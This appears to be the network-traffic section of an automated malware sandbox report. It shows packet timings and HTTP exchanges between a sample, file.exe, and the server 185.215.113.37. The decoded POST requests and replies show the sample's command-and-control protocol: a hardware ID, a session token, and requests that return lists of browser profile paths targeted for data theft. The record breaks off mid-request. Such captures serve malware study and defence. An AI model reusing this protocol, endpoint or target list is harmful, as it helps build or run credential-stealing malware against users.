Sep 26, 2024 22:40:20.508724928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508739948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508774042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508795023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508807898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508817911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508841991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508869886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508882046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508893013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508917093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508925915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508964062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.542805910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.548085928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769301891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769329071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769347906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769365072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769381046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769440889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769459009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769475937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769474030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769474983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769474983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769474983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769501925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769519091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769535065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769552946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769570112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769568920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769568920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769568920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769570112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769587040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769599915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769601107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769613028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769627094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769644022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769650936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769650936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769650936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769659996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769686937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769686937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769695997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769706011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769718885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769736052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769737959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769752979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769776106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769779921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769792080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769804955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769809008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769820929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769830942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769839048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769855022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769871950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769872904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769880056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769901037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769911051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769917965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769934893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769938946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769943953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769958973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769972086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.769989014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.769990921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.770005941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.770010948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.770021915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.770030975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.770049095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.770071030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.770087004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.770114899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.770114899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898510933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898554087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898569107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898586035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898603916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898605108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898621082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898648977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898664951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898679018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898679018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898679018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898683071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898716927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898716927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898736954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898739100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898753881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898772001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898780107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898799896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898801088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898817062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898818970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898847103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898858070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898858070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898863077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898880959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898896933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898916960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898933887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898938894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898950100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898956060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898967028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.898982048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.898984909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899000883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899019957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899038076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899226904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899243116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899259090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899369955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899394989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899411917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899421930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899422884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899422884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899442911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899461985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899477005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899494886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899514914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899516106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899516106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899516106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899543047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899563074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899576902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899593115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899630070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899633884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899651051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899657011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899667978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899679899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899684906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.899707079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899707079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.899727106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:21.351320028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:21.351320028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:21.356494904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:21.356514931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:22.963392973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:22.963617086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:22.964170933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:22.964232922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:22.964845896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:22.964898109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.011790037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.016788960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.240286112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.240303993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.240313053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.240394115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.243050098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.248181105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.488565922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.488617897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.488657951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.488661051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.488662004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.488751888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.488841057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.488878965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:23.488898993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.488940001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.500305891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:23.505770922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:24.227632046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:24.227726936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:24.254918098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:24.260127068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:24.482609034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:24.482686996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:24.483855963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:24.488967896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:25.205889940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:25.205986977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:30.217799902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:30.217871904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:31.619122982 CEST	49730	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.37	80	7344	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:40:03.013909101 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 22:40:03.735167980 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:03.738329887 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFB Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 45 46 42 44 37 35 32 44 42 36 31 37 30 39 33 34 31 30 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="hwid"5EEFBD752DB61709341086------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="build"save------KFCFBFHIEBKJKFHIEBFB--
Sep 26, 2024 22:40:03.985785961 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 6a 45 31 5a 54 64 6d 4f 47 46 69 4e 7a 49 32 59 54 46 6a 4e 7a 59 7a 5a 6a 51 30 4f 57 55 34 4e 57 59 7a 59 7a 4a 6b 4d 54 4d 35 59 6d 45 78 5a 57 46 6a 59 6a 6b 77 4f 54 68 6a 4d 44 49 31 59 7a 41 35 4d 57 55 78 4d 32 5a 6a 4e 54 49 31 4f 54 4d 7a 5a 47 51 7a 5a 54 51 78 59 6a 6c 69 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NjE1ZTdmOGFiNzI2YTFjNzYzZjQ0OWU4NWYzYzJkMTM5YmExZWFjYjkwOThjMDI1YzA5MWUxM2ZjNTI1OTMzZGQzZTQxYjlifHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
Sep 26, 2024 22:40:03.987361908 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBA Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 4b 4a 45 47 49 45 42 46 48 43 41 41 4b 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 4a 45 47 49 45 42 46 48 43 41 41 4b 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 4a 45 47 49 45 42 46 48 43 41 41 4b 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------HDBKJEGIEBFHCAAKKEBAContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------HDBKJEGIEBFHCAAKKEBAContent-Disposition: form-data; name="message"browsers------HDBKJEGIEBFHCAAKKEBA--
Sep 26, 2024 22:40:04.215579033 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 26, 2024 22:40:04.215595961 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 26, 2024 22:40:04.217356920 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAEBGCAAECAKFHIIJDB Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; 